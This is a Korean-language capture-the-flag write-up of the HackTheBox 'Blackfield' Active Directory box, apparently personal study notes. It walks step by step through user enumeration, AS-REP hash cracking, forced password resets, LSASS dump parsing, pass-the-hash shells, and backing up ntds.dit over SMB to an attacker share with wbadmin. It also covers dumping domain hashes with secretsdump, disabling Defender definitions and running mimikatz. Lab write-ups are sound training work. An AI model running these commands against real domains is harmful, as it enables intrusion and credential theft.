AD 공략 3
[목차]
1. CASE 5 - HTB Blackfield
# CASE 5
- HTB Blackfield
[공략 과정 정리]
1. 포트 확인
53, 88, 135, 389, 445, 593, 636, 3268
: 53 DNS, 88 Kerberos, 389 LDAP
135 rpc, 3268 secure ldap, no webserver,
![](https://blog.kakaocdn.net/dn/bbPNXw/btrLOnu7SDH/7xE927VaMRv2x77j1cOxwk/img.png)
> /etc/hosts 에 등록!
2. rpcclient (user list)
# rpcclient 192.168.137.131
# rpcclient 192.168.137.131 -U ''
![](https://blog.kakaocdn.net/dn/kLfKx/btrLLXxeN3c/ZqbeVioQwQAfy9GNCrtY30/img.png)
> Access Denied
3. SMB enum
: smbclient (standard tool)
-with no authentication-
# smbclient -L 192.168.137.131
# smbclient -L 192.168.137.131 -U ''
![](https://blog.kakaocdn.net/dn/bJFicN/btrLNpNyFoJ/i1RprGQ1kKdD90SmZ24Cj0/img.png)
> 결과 차이가 없다
: crackmapexec (pentest tool)
# crackmapexec smb 192.168.137.131 --shares
# crackmapexec smb 192.168.137.131 --shares -u ''
# crackmapexec smb 192.168.137.131 --shares -u '' -p ''
# crackmapexec smb 192.168.137.131 --shares -u 'taku'
# crackmapexec smb 192.168.137.131 --shares -u 'taku' -p ''
![](https://blog.kakaocdn.net/dn/bzZdJN/btrLLXjEsdc/znMoYowWmTyfKD9spgsXH0/img.png)
: smbclient again
# smbclient '//192.168.137.131/profiles'
![](https://blog.kakaocdn.net/dn/bxL4I6/btrLMxdYPQg/DNkvTO9zRqskLObrDvpaY0/img.png)
> 결과가 많을 경우 하나씩 보기보단
마운팅 후에 살펴보는 것이 낫고
하나하나 모두 username으로
추측해 보는 것이 좋다.
: mount
# mount -t cifs '//192.168.137.131/profiles' /mnt
# cd /mnt
# ls -al
# find .
# ls > users.list
![](https://blog.kakaocdn.net/dn/WPfYF/btrLOgbKZJT/VMWgBIaXeBPUsSkyilXhDK/img.png)
![](https://blog.kakaocdn.net/dn/R8tca/btrLMAhu6Cu/q3MX7K0gFbAlHfzTbHe0J1/img.png)
![](https://blog.kakaocdn.net/dn/zcgmi/btrLK6uUoGN/zfBmvR2TImp0Sw7PcuQcn0/img.png)
4. Kerbrute
./kerbrute userenum --dc 192.168.137.131 -d blackfield -o kerbrute_userenum.out users.list
![](https://blog.kakaocdn.net/dn/cC17lN/btrLK5peQPH/6P00jVL8Eh642LngzgT0DK/img.png)
> DNS가 있는 경우 --dc (location) 옵션은
안 추가해도 된다.
![](https://blog.kakaocdn.net/dn/cpFiLK/btrLR8Yn1cE/Scxw1WQaqu6bfXoNu2oRs0/img.png)
> forensic share 내용의 Audit share과
Valid Username의 audit은
연관성이 있어 보인다.
![](https://blog.kakaocdn.net/dn/XjhSI/btrLPcNKuCQ/gP1XLvI14N4Y0hTvSVOEn1/img.png)
> 총 3 개의 usernames 확인
5. userlist 생성
users.txt & dom_users.txt 생성
# users.txt
# cat kerbrute.userenum.out
# grep VALID kerbrute.userenum.out | awk '{print $7}'
# grep VALID kerbrute.userenum.out | awk '{print $7}' | awk -F\@ '{print $1}' > users.txt
# dom_users.txt
# grep VALID kerbrute.userenum.out | awk '{print $7}' | awk -F\@ '{print $2"\\"$1}' > dom_users.txt
![](https://blog.kakaocdn.net/dn/BS0M2/btrLR9pqBEo/JBniywkvIUYKGBctYPbJhK/img.png)
6. GetNPUsers.py
: 사용자가 유효한 경우 해당 사용자의 hash 추출 가능
# GetNPUsers.py -dc-ip 192.168.137.131 -no-pass -usersfile users.txt blackfield/
![](https://blog.kakaocdn.net/dn/EHI1B/btrLLgcWCq9/jUkDgJR17DJUhlpZKLAmb0/img.png)
7. Crack the hashes
# hashcat --example-hashes | grep krb5asrep
# hashcat --example-hashes | grep -B5 krb5asrep
# hashcat -m 18200 hash.hash /usr/share/wordlists/rockyou.txt
# hashcat -m 18200 hash.hash --show
![](https://blog.kakaocdn.net/dn/W9WzA/btrLK5peQ02/314m5g8LWkwnZnTHZHVRm0/img.png)
![](https://blog.kakaocdn.net/dn/vJn0T/btrLMzpltrV/tasnzlRdbP93GQZ7rWRu6K/img.png)
![](https://blog.kakaocdn.net/dn/blYyxC/btrLLgYk1Fb/K2KXst18McnsoKROzbvb40/img.png)
8. crackmapexec again
# crackmapexec smb 192.168.137.131 --shares -u support -p '#00^BlackKnight'
![](https://blog.kakaocdn.net/dn/E48CZ/btrLOnBVmbe/KZ6UtNPgKIQoDP5fXwBTEk/img.png)
9. mount again
# mount -t cifs -o 'username=support,password=#00^BlackKnight' //192.168.137.131/prifiles /mnt
> 빈 내용이더라도 shares에 붙어
확인하는 습관은 좋은 습관이다.
10. rpcclient again
# rpcclient -U support 192.168.137.131
> enumdomusers
![](https://blog.kakaocdn.net/dn/b1G99c/btrLQxRAhlE/FR2KQOvs7AoSKtmnkK7wGK/img.png)
> 모두 복사해 리스팅 작업
# cat lists | awk -F'\[' '{print $2}' | awk -F '\]' '{print $1}' > users.lst
11. GetNPUsers.py again
# GetNPUsers.py -dc-ip 192.168.137.131 -no-pass -userfile users.lst balckfield/
![](https://blog.kakaocdn.net/dn/NQU3g/btrLQmWRAan/N0Y49kaKnoVo1OCQBGtiUk/img.png)
> 추가 발견된 새로운 해시 없음!
12. BloodHound.py
https://github.com/fox-it/BloodHound.py
: 현재 shell을 못 얻은 상황이라
Sharphound.exe 실행이 불가한데
이러한 상황에서 대신 사용할 수 있는 것이
바로 bloodhound.py
![](https://blog.kakaocdn.net/dn/b6d4Ok/btrLOmbYOkW/tlwmBEOnXPf6qCgoA1z9f0/img.png)
![](https://blog.kakaocdn.net/dn/5ukc7/btrLStg4IgZ/wrV30svWokABjtgxEtogo0/img.png)
# bloodhound.py -u support -p '#00^BlackKnight' -ns 192.168.137.131 -d blackfield.local -c all
![](https://blog.kakaocdn.net/dn/bmjzOY/btrLPdskrYE/iMSRrSclOYibNmKAdDdkFk/img.png)
> json 포멧으로 떨궈준다.
# 참고로
-ns flag 없이 기동시키려면
/etc/resolv.conf에 DNS를 추가해야 하는데
AD의 nameserver를 '맨 위'에 추가해야 정상적으로 작동된다.
![](https://blog.kakaocdn.net/dn/bg39o5/btrLLAPNb2r/FxIeKA6KNRomqBPjXkOx1k/img.png)
# bloodhound.py -u support -p '#00^BlackKnight' -d blackfield.local -c all
![](https://blog.kakaocdn.net/dn/dtXc5M/btrLLiaOGTY/ZiUyMvziIusF1G7aitdbgK/img.png)
13. BloodHound
: log4j console > bloodhound
bloodhound.py에서 추출한 json 파일을
GUI bloodhound에 추가한 뒤 작업
![](https://blog.kakaocdn.net/dn/NI45v/btrLQyQuofe/YSJwjDDRP6pEOeKbBdPpTk/img.png)
![](https://blog.kakaocdn.net/dn/bmIDFF/btrLLgjJG6U/HKg93VZtHloG904DjCnUr0/img.png)
: mark user
먼저 찾은 support 사용자부터 마킹
![](https://blog.kakaocdn.net/dn/HGUCH/btrLNqyVO15/sKAY4Bki4UKUWLh46h7zc0/img.png)
> 별거 없는 경우 다른 사용자 마킹 후 enum
> support 사용자로 마킹하는 경우
강제로 암호 변경이 가능!
![](https://blog.kakaocdn.net/dn/3eqLV/btrLMAu2yBD/3miwO9PKz3dbCGtog8DOpk/img.png)
14. rpcclient again
: 강제로 암호 변경
# rpcclient -U support 192.168.137.131
password : #00^BlacKKnight
> setuserinfo2 Audit2020 23 'taku'
> 위 setuserinfo2 명령어의 '23'에 대한 설명을 찾아보면
![](https://blog.kakaocdn.net/dn/l8gJZ/btrLStg4IfV/g82Tgkd4lW3NjjbKAKyOqK/img.png)
![](https://blog.kakaocdn.net/dn/cvXnyI/btrLPn2KLdY/yzDQJyXr7AQ2TO07IELJKk/img.png)
: run commands & 확인
> 처음 변경 시도는 fail.
비밀번호 복잡도 정책에 맞지 않기 때문인데
다시한번 시도하면 정상 반영됨
> 비번이 정상적으로 변경되었는지는
crackmapexec으로 확인
# crackmapexec smb 192.168.137.131 -u Audit2020 -p taku
![](https://blog.kakaocdn.net/dn/sFQYB/btrLLgqsTRr/OkJdiSMcG7f0QNto0gt6p1/img.png)
> 정상 반영되면 새 shares 접근이 가능해 진다.
15. mount again
# mount -t cifs -o 'username=audit2020,password=taku' //192.168.137.131/forensic /mnt
![](https://blog.kakaocdn.net/dn/G7D0U/btrLLxevnpo/inyV9hoHhroNahxCWnjTXK/img.png)
![](https://blog.kakaocdn.net/dn/bW8JLQ/btrLLyLb0uw/8DK8WgMkkn2IUUMeqrQVTK/img.png)
: 주목할 만한 파일은
/memory_analysis 폴더 내 lsass.zip로
lsass.zip은 mimikatz가 plain text passwords를
추출하는 곳!
![](https://blog.kakaocdn.net/dn/JT2Bw/btrLTDcW4a7/jh6AxuPmoWFAXBKKmKYYN0/img.png)
16. pypykatz
: upzip 후 확인
![](https://blog.kakaocdn.net/dn/V76U7/btrLLBnTuWY/MyWqXyXYhCeefjaiifm3t1/img.png)
![](https://blog.kakaocdn.net/dn/bbFqW3/btrLLyLoTNO/M7yVxrk7O9JApNbb6j65a1/img.png)
: run pypykatz
# pypykatz lsa minidump lsass.DMP
# pypykatz lsa minidump lsass.DMP > lsass.out
# less lsass.out
# grep NT lsass.out
# grep NT lsass.out -B3 | grep -i username
# grep NT lsass.out
![](https://blog.kakaocdn.net/dn/dGGYkw/btrLOlRRBIK/UrQVscwsEK8uyACAc22GzK/img.png)
![](https://blog.kakaocdn.net/dn/owX6j/btrLR8EhnVd/Tw8I5mC9FdT4iiguu71YQ0/img.png)
![](https://blog.kakaocdn.net/dn/4XzMA/btrLLy5HR8T/K4iFHvwy61kQZ3omZTNJUk/img.png)
: lsass.out에서 user account NT HASH 저장
![](https://blog.kakaocdn.net/dn/bwattY/btrLPcmSnoy/gsRuUbky51WHrkGR0zT3w1/img.png)
17. crackmapexec + winrm to get a shell
# crackmapexec smb 192.168.137.131 -u svc_backup -H 96~~~~~~~~~~~~~~~~~~~~~
# crackmapexec winrm 192.168.137.131 -u svc_backup -H 96~~~~~~~~~~~~~~~~~~~~~
> (Pwn3d!)가 뜨면 evil-winrm
# evil-winrm -i 192.168.137.131 -u svc_backup
![](https://blog.kakaocdn.net/dn/P8wJ9/btrLMxFet2J/xkhxefZeRpsfdh2kNStCj0/img.png)
> administrator는 LOGIN FAILIURE
![](https://blog.kakaocdn.net/dn/HHOyP/btrLMwTToUd/J1rMiZpHUoMwtTDUKQe1vK/img.png)
> 첫 로그인
18. check permissions
![](https://blog.kakaocdn.net/dn/bc8nGB/btrLLxeIugB/ff1AAeqSK9PnxPT1nVCAH1/img.png)
> SeBackupPrivilege
# SeBackupPrivilege
![](https://blog.kakaocdn.net/dn/cROMRh/btrLOnPGN9p/lZ3Hyyr3tQP02i8yQkIRyK/img.png)
> save things out of registry
![](https://blog.kakaocdn.net/dn/biAe6W/btrLLAP0BVo/rvfsNze5gLKpl6KvfRV1HK/img.png)
> read files normaly can't access
![](https://blog.kakaocdn.net/dn/EGGWb/btrLPedUoeN/Rdasq9aB84nas03zogXjT1/img.png)
> restore(backup) files the NTDS.DIT with 'wbadmin.exe' or 'diskshadow.exe'
![](https://blog.kakaocdn.net/dn/wCfDt/btrLNwe0MuF/BtHDdGEDQmX3o8RnCdfTn1/img.png)
> PoC
19. smbserver + backup files with wbadmin + Create NTFS Folder
# on Kali
# mkdir smb
# chmod 777 smb
# cd smb
# smbserver.py -smb2support -user taku -password daddy anysharenamehere $(pwd)
![](https://blog.kakaocdn.net/dn/bKyeho/btrLTWctcWY/gT7EmaMCSlvT9v2xxrwAK0/img.png)
# On Windows
# 마운트 접속 test
C:\> net use x: \\192.168.49.137\anysharenamehere /user:taku daddy
C:\> x:
C:\> dir
C:\> c:
C:\> echo Y | wbadmin start backup -backuptarget:\\192.168.137.131\anysharenamehere -include:c:\windows\ntds\
# 잘못 된 경우 삭제
C:\> net user x: \\192.168.137.131\anysharenamehere /delete
![](https://blog.kakaocdn.net/dn/bl5qFC/btrLLzp2iDB/eb33MldnqZmX76t9YqNPx1/img.png)
![](https://blog.kakaocdn.net/dn/ciY2ml/btrLPd68vQG/febHfwA4wsqGBJf2LdqkVK/img.png)
![](https://blog.kakaocdn.net/dn/B8RSo/btrLSve6Zj4/uUQhvyukt4VDPkM7RMCxk1/img.png)
![](https://blog.kakaocdn.net/dn/bJEaWk/btrLR76qeXs/HHfHSwxcxNaNZjJ7C3b2GK/img.png)
> shared 폴더가 NTFS 포멧으로 되어있지 않아 fail.
# On Kali
: NTFS Folder 생성
# dd if=/dev/zero of=ntfs.disk bs=1024M count=2 (2GB ntfs disk 생성)
# losetup -fP ntfs.disk (loop back setcup)
# losetup -a
# mkfs.ntfs /dev/loop0
# mount /dev/loop0 smb/
# mount | grep smb
# cd smb/
![](https://blog.kakaocdn.net/dn/bgGyWX/btrLR7FkouT/aJKoJKmGjfa1uSjhXJRd81/img.png)
> ntfs.disk 생성 완료, 마운트 시켜주면
![](https://blog.kakaocdn.net/dn/bClU5F/btrLMAhItdw/guKsHNvynEsh72FqaFTU7k/img.png)
> 완료
# smb conf 설정
/etc/samb/smb.conf
![](https://blog.kakaocdn.net/dn/cHtJCy/btrLLyLoTNh/CGrmTmXeFL9Wjk2OSRrKnk/img.png)
![](https://blog.kakaocdn.net/dn/d4Hppy/btrLLxscfH0/CQXC9Jcx14k4MAq1uOkc11/img.png)
# on Windows
C:\> wbadmin get versions
![](https://blog.kakaocdn.net/dn/m6ReB/btrLQmJyXN8/nlVkKDK1KdypGf797J9C1k/img.png)
C:\> echo Y | wbadmin start recovery -version:10/02/2020-03:51 -itemtype:file -items:C:\Windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl
![](https://blog.kakaocdn.net/dn/pWyMz/btrLR8xun4Q/eadJ9Kj0w7Ts84JKGVyQh0/img.png)
![](https://blog.kakaocdn.net/dn/bwHF7g/btrLNwMQ7dU/KFJuP7ns21BR0PEydI7PRK/img.png)
![](https://blog.kakaocdn.net/dn/uKsUw/btrLQxK29ks/kCQxxz4KLFv2aL3evRJZJ0/img.png)
> 성공!
20. ntds.dit crack
: ntds.dit는 AD의 Domain Database로
시스템의 boot key로 system.hive에 암호화 되어있다.
AD DB를 받고 해당 DB에 접근할 수 있는 password를 받은 뒤
DB안에 있는 모든 account 정보를 추출한다.
C:\> reg save hklm\system system.hive
![](https://blog.kakaocdn.net/dn/bgmrHL/btrLOmJXDIg/ojktO9MverwRW9RGzz0fJk/img.png)
: secretsdump.py
# secretsdump.py -ntds ntds.dit -system system.hive LOCAL
# secretsdump.py -ntds ntds.dit -system system.hive -history LOCAL (-history dump password history)
![](https://blog.kakaocdn.net/dn/H6PBD/btrLLAicQrz/PQTkqz6uic6dyMgh25o7xk/img.png)
![](https://blog.kakaocdn.net/dn/DMnEe/btrLMwzyoRc/q7OG7f92N4fFlYZ5M7AX21/img.png)
> 위 명령어를 둘 다 돌려보고 차이를 확인한다.
![](https://blog.kakaocdn.net/dn/Kdtaj/btrLLxZ04sV/j44VtwWJPfVCzzdDRCNPlk/img.png)
![](https://blog.kakaocdn.net/dn/clT7Uu/btrLNpG1xCM/MYKQuDgYtj9UZC46w2Eikk/img.png)
![](https://blog.kakaocdn.net/dn/sxBZ8/btrLTCyk9fi/3MNIn7NZ2Hcw9URr4uowkK/img.png)
21. PsExec
# psexec.py -hashes NTLM:NTLM administrator@192.168.137.131
(동일한 NTLM 두번 사용한 이유는 더 빠르기 때문)
![](https://blog.kakaocdn.net/dn/bDJ5lE/btrLTUZ1pg4/sMqy22sTf8lPK2uSWvLrrk/img.png)
> system인데 root.txt이 access denied.
![](https://blog.kakaocdn.net/dn/dyqdyV/btrLMxrIsqR/2rJJklGx7cT7280cqDu3F0/img.png)
: root.txt cipher 정보 확인
C:\> cipher /c root.txt
![](https://blog.kakaocdn.net/dn/St6sg/btrLNwMQ7hi/qCQ4zOukLlR5OF1e0Za5vK/img.png)
> root.txt는 Administrator만
복호화 할 수 있다. 현재는 system
22. wmiexec
system으로 접속하지 않을때 사용
![](https://blog.kakaocdn.net/dn/pkwWl/btrLR9iS69L/SQSunaK3WIZAwXU9frcBL1/img.png)
# wmiexec.py -hashes NTLM:NTLM administrator@192.168.137.131
![](https://blog.kakaocdn.net/dn/4aB0w/btrLLiozz3S/c98WbUhgmF1QmKysCQNMB0/img.png)
> administrator로 접속 후 root.txt 정상 확인!
23. Mimikatz
: reset the hash
C:\> mimikatz.exe "lsadump::setntlm /user:Audit2020 /ntlm:600a406c~~~~~~~~~~~"
![](https://blog.kakaocdn.net/dn/bgfULy/btrLLj14mJl/I9AvKPyCnSO0bixW2kcvkk/img.png)
![](https://blog.kakaocdn.net/dn/H5cty/btrLMxrIsxy/PKErMxkRaIbWGUxviU4t70/img.png)
> 실패
![](https://blog.kakaocdn.net/dn/D31YX/btrLLgxo2PO/JJRtqWgjijYeIRWfPN2rhk/img.png)
> antivirus(추정) 때문에 mimikatz가 삭제되어 있다.
: disable antivirus
C:\PROGRA~1\Windows Defender>.\mpcmdrun.exe -RemoveDefinitions -ALL
![](https://blog.kakaocdn.net/dn/bhMhHL/btrLR7L8Ryp/lpEkLBB6wjRqwCgGpcsU0k/img.png)
: mimikatz 재 업로드 후 run
> antivirus 때문이 아닌
upload binary가 없는 경우로
smb 또는 PS로 전송!
C:\> mimikatz.exe "lsadump::setntlm /user:Audit2020 /ntlm:600a406c~~~~~~~~~~~"
![](https://blog.kakaocdn.net/dn/28a6G/btrLMzC5R7U/lJsYiRiVH8y5sEFfoJ3XR1/img.png)
> ntlm reset 완료!
: crackmapexec으로 확인
# crackmapexec smb 192.168.137.131 -u audit2020 -H 600a406c~~~~~~~~~~~
![](https://blog.kakaocdn.net/dn/b4bkfM/btrLLiozz2k/9FD1sKLExOQKgTNRmEyyRK/img.png)
> 정상 반영 확인!
끝